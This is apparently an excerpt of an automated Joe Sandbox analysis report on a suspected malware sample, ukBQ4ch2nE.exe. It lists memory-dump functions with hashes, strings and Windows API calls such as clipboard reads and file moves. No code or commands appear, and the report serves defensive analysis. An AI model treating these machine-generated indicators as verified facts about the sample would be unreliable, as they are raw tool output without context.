Opcode Fuzzy Hash: 77276e62ab3dae9f3d483594268229a3868136f3d5c36fcbddf86b116a15dd82
Instruction Fuzzy Hash: 28113AB1D002488FDB20DFAAC4457DFFBF9EF88324F248419D519A7240DB79A944CBA4

Function 0316B2A0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0316B306

Memory Dump Source

Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: cf0d8977389e5dbf02ce3ee8845a6050fbaf93e135d6746ef1f38874b125e8bb
Instruction ID: 86f7e45e390bbf2f9ca396f1d8358c62cc9774e784feacf3ac0fd975ed50e2c0
Opcode Fuzzy Hash: cf0d8977389e5dbf02ce3ee8845a6050fbaf93e135d6746ef1f38874b125e8bb
Instruction Fuzzy Hash: 7611E0B5D006498FCB20CF9AC444ADEFBF8EF88320F14852AD469B7210D379A545CFA5

Function 017AD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1578153715.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_17ad000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ca163f7d4eefbc831ac8c3b0a3dbd401afc627d2843bdc514e7e3fdddf2df7
Instruction ID: 2d21f2db5274e4bcf7caf3fc78098085002c55d66ac3f381f6f929c4b27fdd51
Opcode Fuzzy Hash: 06ca163f7d4eefbc831ac8c3b0a3dbd401afc627d2843bdc514e7e3fdddf2df7
Instruction Fuzzy Hash: CC2136B1500200DFDB21DF88C9C0B56FF65FBC8314F64C6A8ED090B656C336E406CAA2

Function 017BD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1578195247.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_17bd000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a2524e3ca2786a9cc64dba9d31546b0ba553aebe46fc4d9a7239c9f7e8bcdf0
Instruction ID: a5d6fcf27ed24bd0c49101888612eec8641fcffab0ea0faa339814aa2645633c
Opcode Fuzzy Hash: 5a2524e3ca2786a9cc64dba9d31546b0ba553aebe46fc4d9a7239c9f7e8bcdf0
Instruction Fuzzy Hash: C0213771604200DFDB25DF98D5C0B56FFA5FB88318F24C5ADE9094B246C33AD407CA61

Function 017AD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1578153715.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_17ad000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
Instruction ID: 00a0314d983c4e7a33482a5bdbc943e2d0bdb8c48e8d9e3c65080e4da7dc911e
Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
Instruction Fuzzy Hash: 1411CD76404280CFDB12CF44D5C4B56BF62FB84224F2482A9DD090B656C33AE45ACBA1

Function 017BD017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1578195247.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_17bd000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
Instruction ID: f96edb47a6fce16961c4615d787f6b8a138835b02d731aa5deb1e290b3ae5d97
Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
Instruction Fuzzy Hash: 9511D075504280CFDB22CF54D5C4B55FF61FB44318F24C6A9D8094B656C33AD40ACB61

Non-executed Functions

Function 05870040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72e9fe17a645df81768efd4556d2519be98c4a4a3ef2cd7ba18a3564de8a71e3
Instruction ID: c1a430879bca3d8da2d6754c0c2d70706066b7830eb4a4c8ec79cbb50ff347ed
Opcode Fuzzy Hash: 72e9fe17a645df81768efd4556d2519be98c4a4a3ef2cd7ba18a3564de8a71e3
Instruction Fuzzy Hash: 451265F18017468AE710EF65F94C289BBB1FB46318FB0C609D2656F2E9DBB8154ACF44

Function 0316DEE4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b01b85e3f3e56c69e24c02b041574468fb8eca4934bd3ba8388705e237f1c070
Instruction ID: 0fed0c0aa5569a0968c858842297e6909e9495294ae1aba01391c801b184e1d8
Opcode Fuzzy Hash: b01b85e3f3e56c69e24c02b041574468fb8eca4934bd3ba8388705e237f1c070
Instruction Fuzzy Hash: 3FA19F36E003198FCF05DFB5D85449EB7B6FF88300B1585AAE805AF265DB71E966CB80

Function 05870007 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a9b5011094bbafbbbee568091527629aa9d235fd06e923c6d693b95541d8c66
Instruction ID: 9201c149d51e31ff87a62443ba57b8e209fb0d29038796377787be9a332d97d9
Opcode Fuzzy Hash: 7a9b5011094bbafbbbee568091527629aa9d235fd06e923c6d693b95541d8c66
Instruction Fuzzy Hash: 4CC1F5B08017468FE710EF69F94C289BBB1FB86324F758219D1616F2E9DBB8144ACF44

Analysis Process: ukBQ4ch2nE.exePID: 6412, Parent PID: 4576COMMON

Execution Graph

Execution Coverage:	13.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	173
Total number of Limit Nodes:	16

Executed Functions

Function 066330A8 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 06633800
$eq, xrefs: 066337D0
$eq, xrefs: 066337A7
$eq, xrefs: 066337DC
$eq, xrefs: 066337F4
$eq, xrefs: 066337B3

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-220072568
Opcode ID: 2ebb74838bb396cdf1f269495a412cd403bf728e55f48d045e354464a4634633
Instruction ID: cabdbe758fe019c93f69eebe56905576cd9030eea594f16f7b09d8065aca9edd
Opcode Fuzzy Hash: 2ebb74838bb396cdf1f269495a412cd403bf728e55f48d045e354464a4634633
Instruction Fuzzy Hash: 9C320C30E1065A8FCB55EF75C99459EF7B2FF89300F5086A9D449AB364EF30A985CB80

Function 066379C8 Relevance: 3.0, Strings: 2, Instructions: 473
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 06637D05
$eq, xrefs: 06637D11

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: $eq$$eq
API String ID: 0-2246304398
Opcode ID: 6fdbf48f69b33beee54cc2e079b269cd5393a8c9861e30598ed4eef0e828ce53
Instruction ID: 45e6aa9cbb3735f136bcb02b6f046c2d8ec7ebb23c89cd92c563ad2dc088c40b
Opcode Fuzzy Hash: 6fdbf48f69b33beee54cc2e079b269cd5393a8c9861e30598ed4eef0e828ce53
Instruction Fuzzy Hash: 09029F70B002259FDB54DB75D9946AEBBE2FF84300F248569E406DB395EB31ED82CB84

Function 0663591B Relevance: 2.9, Strings: 2, Instructions: 417
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPjq, xrefs: 06635BE2
\Ojq, xrefs: 06635A5E

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: XPjq$\Ojq
API String ID: 0-3813800045
Opcode ID: 11b1f8a370e78cc5d211acdb02fb82a73ae747c8ce7ff3512fb899e2b0809dfc
Instruction ID: 2477837c242d8e5d238041a85643cbcad1e414ca3ae58466ffc824623d525d5e
Opcode Fuzzy Hash: 11b1f8a370e78cc5d211acdb02fb82a73ae747c8ce7ff3512fb899e2b0809dfc
Instruction Fuzzy Hash: 5AE1F371B101648FDB54DB68D494AAEBBF2FF89320F2584AAE407DB391CA30DC45C790

Function 066351E8 Relevance: 1.8, Strings: 1, Instructions: 590COMMON

Download Yara Rule

Strings

$, xrefs: 06635539

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 3f6946c6d863ec61f477c5cb697dfa328f6119b3c82cc1318c93abdcec11b296
Instruction ID: 88f0c3b70fab987ce235f135f64ca6ee777ad3b703171967dfe58440bb162b3d
Opcode Fuzzy Hash: 3f6946c6d863ec61f477c5cb697dfa328f6119b3c82cc1318c93abdcec11b296
Instruction Fuzzy Hash: 7D22B271E002258FDF64DBA4C5806AEBBF2FF85320F248469E406AB395DB75ED41CB91

Function 06636238 Relevance: .8, Instructions: 821COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c8f20b3215f2a309d04a8e95d34dfcbe9155c2440ea1787e6f7d27c5e87874c
Instruction ID: a25da255e70960ae50b3b149f0852dc5e7d770c4709e0cf0b7019619f7ce7e41
Opcode Fuzzy Hash: 8c8f20b3215f2a309d04a8e95d34dfcbe9155c2440ea1787e6f7d27c5e87874c
Instruction Fuzzy Hash: 2C629E34B00215AFDB54DB68D594AAEBBF2EF88310F248469E406DB395DB35ED42CB90

Function 0663C1D8 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac1d35f4f92ace9b5349faae0d257a54b5445ae9540795983cdd328bf7393fd
Instruction ID: 14f3e199403898aa81e6cc73a474141c7fb2160c0a7f02239601ce13e154a2ae
Opcode Fuzzy Hash: 3ac1d35f4f92ace9b5349faae0d257a54b5445ae9540795983cdd328bf7393fd
Instruction Fuzzy Hash: 1A329034F102199FDF54DB68D990BAEB7B2EB89310F108529E906EB355DB34EC42CB91

Function 0663AE6A Relevance: .6, Instructions: 569COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d186f7de5e5acf67bbb34fcbc8c7ee0b2ab06a70a9eeacb3ef70ea0281715663
Instruction ID: 3e272455f45ee7dcc9256388c8549203c9a987eb91520b2a3f883cedd0bfa3a2
Opcode Fuzzy Hash: d186f7de5e5acf67bbb34fcbc8c7ee0b2ab06a70a9eeacb3ef70ea0281715663
Instruction Fuzzy Hash: B2229170E102198FDFA4CF69D5907AEB7B2EB85310F24852AE409DB395DB35DC81CB91

Function 0663A910 Relevance: 10.4, Strings: 8, Instructions: 389
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 0663AABF
$eq, xrefs: 0663AA31
$eq, xrefs: 0663AA84
$eq, xrefs: 0663AA90
$eq, xrefs: 0663AAB3
$eq, xrefs: 0663AA3D
$eq, xrefs: 0663AAE8
$eq, xrefs: 0663AADC

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-1110479544
Opcode ID: 5e7134433e080bc7d0e009e8d403eca14dfb73f380749adbf80643b20765c1b0
Instruction ID: a5a8e140537153c7384c7f5442011f2b9812b93c4471231cc56c8454881aabc6
Opcode Fuzzy Hash: 5e7134433e080bc7d0e009e8d403eca14dfb73f380749adbf80643b20765c1b0
Instruction Fuzzy Hash: 65E18031E1021A8FCF65DFA5D5906AEB7F2FF85300F208529E446EB394EB359842DB81

Function 065E6E41 Relevance: 6.1, APIs: 4, Instructions: 136
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 065E6ECE
GetCurrentThread.KERNEL32 ref: 065E6F0B
GetCurrentProcess.KERNEL32 ref: 065E6F48
GetCurrentThreadId.KERNEL32 ref: 065E6FA1

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 7623e3d2c64a51d3ed3a24296c5ab83b90db486f735e70a692a4be235c6cd786
Instruction ID: 2abc3468c31e105f69a619b28ec9a942b00605d0010a130e40d343d9a56ccfee
Opcode Fuzzy Hash: 7623e3d2c64a51d3ed3a24296c5ab83b90db486f735e70a692a4be235c6cd786
Instruction Fuzzy Hash: 755167B0900649CFDB98CFAAC948B9EBBF1FF48310F248459E019A72A1DB755944CF65

Function 065E6E50 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 065E6ECE
GetCurrentThread.KERNEL32 ref: 065E6F0B
GetCurrentProcess.KERNEL32 ref: 065E6F48
GetCurrentThreadId.KERNEL32 ref: 065E6FA1

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 905c6eb8a04ff8d177027c297645c5c87a763264c901c9e19a73ae561f0f6092
Instruction ID: 2d7ed5b08684448ff4888f5c4c1ab632356ac6e898aae5995b23829419352b7b
Opcode Fuzzy Hash: 905c6eb8a04ff8d177027c297645c5c87a763264c901c9e19a73ae561f0f6092
Instruction Fuzzy Hash: 835155B0D00249CFDB98CFAAC948B9EBBF1EF88310F248459E419A73A0DB355944CF65

Function 06638D98 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 06638DDF
$eq, xrefs: 06638E1A
$eq, xrefs: 06638E26
$eq, xrefs: 06638DEB

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq
API String ID: 0-812946093
Opcode ID: 95b61fcdca3f24353c41e2d07839a85b4326b9360be36eb2a9f145dc1d82e328
Instruction ID: 6229f7ff8f4859eba8d621fba4536010dd70318390006afb8a0a5c068c2f4bdd
Opcode Fuzzy Hash: 95b61fcdca3f24353c41e2d07839a85b4326b9360be36eb2a9f145dc1d82e328
Instruction Fuzzy Hash: 45913F30F0061A8BDB54DB75D9507AFB7F6EB85300F108569D4099B398FB719D42CB91

Function 0663CFA0 Relevance: 4.6, Strings: 3, Instructions: 801
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 0663D397
$eq, xrefs: 0663D3AB
$eq, xrefs: 0663D39F

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq
API String ID: 0-177832560
Opcode ID: d772bb903bcd2e0e697f3c2fe2af0d6e2f8c9d9d3ba048abad10f9faea946d0d
Instruction ID: 4f73c011530f399fec62f4dc948b31d3c7787874adbf0c38ef0c75db262a72cc
Opcode Fuzzy Hash: d772bb903bcd2e0e697f3c2fe2af0d6e2f8c9d9d3ba048abad10f9faea946d0d
Instruction Fuzzy Hash: 89627230A102168FCB55EF69D690A5EB7F2FF85300F248968D4069F359EB71ED86CB81

Function 066347B0 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Ojq, xrefs: 0663498B
fjq, xrefs: 066347DB
XPjq, xrefs: 06634901

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: fjq$XPjq$\Ojq
API String ID: 0-216941231
Opcode ID: 321e2044f453affb90b4ccbb1ca60b81d208c0c3cb83a48395cc6eb734f2606b
Instruction ID: 3cd7a6a250e43dc4d1e892117f097d1e85b6f84c6c6e6dd55eba003948cc9377
Opcode Fuzzy Hash: 321e2044f453affb90b4ccbb1ca60b81d208c0c3cb83a48395cc6eb734f2606b
Instruction Fuzzy Hash: C8616C70E002189FEB549FA5C8547AEBBF6EF88700F20802AE506AB395DF758D458B91

Function 06638D89 Relevance: 2.7, Strings: 2, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 06638DDF
$eq, xrefs: 06638E1A

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: $eq$$eq
API String ID: 0-2246304398
Opcode ID: f9066fd6614df58d7665f35dfb6488c78efc850e11624f669622d87de0201a23
Instruction ID: 553a0c2ca2e37f70b67e7e18dff81064a0cfb7f8d84fdcfda56c451c78ccc9f1
Opcode Fuzzy Hash: f9066fd6614df58d7665f35dfb6488c78efc850e11624f669622d87de0201a23
Instruction Fuzzy Hash: 57514E30B006169FDB54EB74DA60BAF77F6EB88200F10846DD506DB398EB71AC42CB91

Function 066347A0 Relevance: 2.6, Strings: 2, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fjq, xrefs: 066347DB
XPjq, xrefs: 06634901

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: fjq$XPjq
API String ID: 0-1938862144
Opcode ID: acbdbcbb47f692c804969222b6d4b0c81e26ec1db767a6f8cc3d70473628d467
Instruction ID: d94acb9b2df7124da94c36def60e05fdd1a5471cd01e55cc530bc1c7ffe74983
Opcode Fuzzy Hash: acbdbcbb47f692c804969222b6d4b0c81e26ec1db767a6f8cc3d70473628d467
Instruction Fuzzy Hash: F1516D70F002189FEB55DFA5C854BAFBBF6EF88700F20856AE105AB395DE749C018B91

Function 065E344D Relevance: 1.6, APIs: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065E356A

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 495c3f3f68f2cf758bf15e93d53e79a2a3e08d207cf1f5e38ce0424898d4c103
Instruction ID: 85232976d93bc2ad27227f9d991eb50c35f77435a088189da85dc207275d9b3b
Opcode Fuzzy Hash: 495c3f3f68f2cf758bf15e93d53e79a2a3e08d207cf1f5e38ce0424898d4c103
Instruction Fuzzy Hash: DD51C1B1D00309AFDF14CF9AC884ADEBBB5FF48310F24812AE419AB210D7759945CF90

Function 065E3458 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065E356A

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f3219e196255fcb4ed025bcfb2ead9ed01fd0dbdb5547640b7b135a5504e04e7
Instruction ID: b68560b27f467505cc8a70d58b5ab4ed256fbd4d9c9407dfd380ba781581adfe
Opcode Fuzzy Hash: f3219e196255fcb4ed025bcfb2ead9ed01fd0dbdb5547640b7b135a5504e04e7
Instruction Fuzzy Hash: 6A41BEB1D00349DFDF14CF9AC984ADEBBB5BF88310F64862AE819AB210D7759945CF90

Function 065E6C94 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 065E7FE9

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 870cbaaa67eb6a8d3a84bdb0105a6586adafd697ee75425ad74b9f0b19bc62c4
Instruction ID: d52cfa544e10d62e5d654f3006b45910de8a751c911d0b73b5f28f512ed1dd14
Opcode Fuzzy Hash: 870cbaaa67eb6a8d3a84bdb0105a6586adafd697ee75425ad74b9f0b19bc62c4
Instruction Fuzzy Hash: 12411BB8900345CFDB54CF99C448AAABBF5FF8C314F248859E519AB321D375A841CFA0

Function 00B9F732 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 00B9F7DF

Memory Dump Source

Source File: 00000002.00000002.4034514264.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ukBQ4ch2nE.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 4e3f22f475c1c35540d72753a1ad3e9dd20a0af2f78d1227a793d9585cec3356
Instruction ID: fe5795d8e45ef11c01c828a17666539ed1071aea930d768a4e8da8732c5e8810
Opcode Fuzzy Hash: 4e3f22f475c1c35540d72753a1ad3e9dd20a0af2f78d1227a793d9585cec3356
Instruction Fuzzy Hash: 1C31CBB1D042998FCB10CFA9D4457EEBFF5AF49320F2485AAD804E7251DB789804CBE2

Function 065E2322 Relevance: 1.6, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 065E2416

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 39d3c3602118b2643abf3cc467fa335a201f19f71b9a777c89cdb92e959e3bdd
Instruction ID: b2702c43b5d99f1e5aa84da5e859935325cdd9a577a044dd68e47fb3a3700dd4
Opcode Fuzzy Hash: 39d3c3602118b2643abf3cc467fa335a201f19f71b9a777c89cdb92e959e3bdd
Instruction Fuzzy Hash: 5031D0B0D043858FCB19CF7AC81469EBFF9AF8A310F14859AD055E7292C7789905CFA1

Function 065E8C6D Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 065E8D00

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 83317a0edccb66080b9c01c1c8cdc5a63d243edd2228ee80ad299373c7cdf31c
Instruction ID: 12caee2c6f0379badb4de257ea4f6dd5de91f62da33b4f0c1fc6e050c79a6854
Opcode Fuzzy Hash: 83317a0edccb66080b9c01c1c8cdc5a63d243edd2228ee80ad299373c7cdf31c
Instruction Fuzzy Hash: B131F0B4D01249EFDB24CF99C984BCEBBF5AF48314F24845AE404AB290C7B56845CB91

Function 065E8C78 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 065E8D00

Memory Dump Source

Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: bbeb73d96a33fa91b14befb732b39163490fa2833ceb0c33c04dfc574cbf2a52
Instruction ID: 918a7c1f116046b8248ab6260e46fe6c1a1ebfbf4eed9ca9f7710b2251992b40
Opcode Fuzzy Hash: bbeb73d96a33fa91b14befb732b39163490fa2833ceb0c33c04dfc574cbf2a52
Instruction Fuzzy Hash: 033100B4D01248DFDB24CF99C984BCDBBF5BF48314F24841AE404AB290C7756845CF91

Function 00B97800 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 00B986D0

Memory Dump Source

Source File: 00000002.00000002.4034514264.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ukBQ4ch2nE.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: a58605cbad6212a6f09cffe6befeb8cc435804b1c3b01ed398d71c24f909fcad
Instruction ID: 4de5d5680aeef0e71d6f1eb95ff12d9932251dd21687eb19e4726a37b015a599
Opcode Fuzzy Hash: a58605cbad6212a6f09cffe6befeb8cc435804b1c3b01ed398d71c24f909fcad
Instruction Fuzzy Hash: 0E2127B6C002089FCF50CF99D884ADEFBF5FB89310F24816AE818AB201C7759904CBA4

Function 065E7090 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065E711F

Memory Dump Source

